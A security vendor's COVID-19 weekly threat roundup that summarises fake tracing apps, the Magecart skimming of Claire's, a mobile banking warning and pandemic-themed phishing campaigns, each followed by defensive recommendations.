The COVID-19 Weekly Threat Roundup series is part of how we’re helping our customers and the broader cybersecurity community during this challenging period.
This news is designed to help you and your team continue to defend your organizations from evolving cybersecurity threats during the COVID-19 pandemic.
Each item includes a new cyberattack, with attack vectors, IOCs, and security recommendations (as applicable), combining credible open-source threat intelligence with insights from the Arctic Wolf team.
You can also read previous roundups on our COVID-19 blog feed, highlighted with the orange threat roundup banner.
1. Malicious Phone Apps Exploit COVID-19
Fake COVID-19 Tracing Apps Download Malware
Attack Summary: Multiple countries have released smartphone applications used to track COVID-19 and provide health information to citizens. In these attack campaigns, malicious actors release applications designed to impersonate legitimate COVID tracking apps. These fake apps contain or download commodity Android malware, including banking trojans and spyware.
- Train employees about the risk of malicious applications impersonating official COVID apps
- Establish security policies about work use of personal devices to reduce data exposure
- Use detection and response solutions to identify systems compromised by malicious applications
2. Attacks on Remote Commerce
Attackers Targeted Claire’s E-Commerce When Stores Closed
Attack Summary: Magecart is a hacker group that typically targets e-commerce platforms. In this attack, they targeted Claire’s, a fashion retailer. On March 20, Claire’s closed three thousand locations worldwide in response to the coronavirus pandemic. The next day, an anonymous party registered the domain “claires-assets[.]com”. Then, attackers inserted malicious code onto store servers, so that each order would exfiltrate data to their malicious domain. When informed by security researchers, Claire’s remediated the error.
- Businesses that use e-commerce platforms should evaluate their security posture in light of a likely increase in attacks against e-commerce
- It is not clear how Magecart compromised Claire’s e-commerce platform; attack vectors may include leaked credentials, spearphishing, or network compromise
- Use detection and response and account takeover solutions to protect against potential vectors of compromise
FBI Warns of Attacks on Mobile Banking Apps
Attack Summary: The FBI has issued a warning about increasing attacks against mobile banking. The warning notes that mobile banking has surged 50% since the beginning of 2020, and highlights app-based banking trojans and fake banking apps as major mobile banking threats.
- Warn employees about the risk of mobile banking attacks
- Implement multi-factor authentication security for banking and other secure accounts
- Use detection and response solutions to identify malicious applications on business endpoints, including employee devices used for work activities
3. COVID Phishing Update
New Hacker Organization, “Vendetta”, Impersonates Taiwanese CDC
Attack Summary: “Vendetta”, a new hacker organization active since May of 2020, is focused on COVID-19 related phishing campaigns. In this campaign, Vendetta impersonated the Taiwanese CDC and falsely informed targets that a close contact had contracted a case of COVID-19. The phishing email encouraged targets to download an attachment with information for making a testing appointment. The malicious attachment moves through multiple obfuscation layers before finally deploying the Nanocore Remote Access Trojan.
Further hashes related to Vendetta are available at the source link below
- Ensure employees are aware of the risk of phishing campaigns impersonating health authorities
- Update mail and endpoint security with the latest IOCs to block attacks
- Employ detection and response solutions to identify systems compromised by malware, or connections back to C2 servers, in order to promptly respond to attacks
Phishing Attack Spoofs Reimbursement Policy, “COVID-19 Relief Plan”
Attack Summary: In this broad campaign, attackers distributed malicious HTM files as attachments in emails purporting to come from targets’ Human Resources departments. The user is encouraged to log on and review a policy, and redirected to a phishing page that steals O365 credentials.
- Implement mail security controls to help employees recognize external actors impersonating company departments
- Detection and response solutions can identify when credentials are shared with malicious sites
- Account takeover risk solutions can identify compromised credentials, enabling businesses to mitigate risk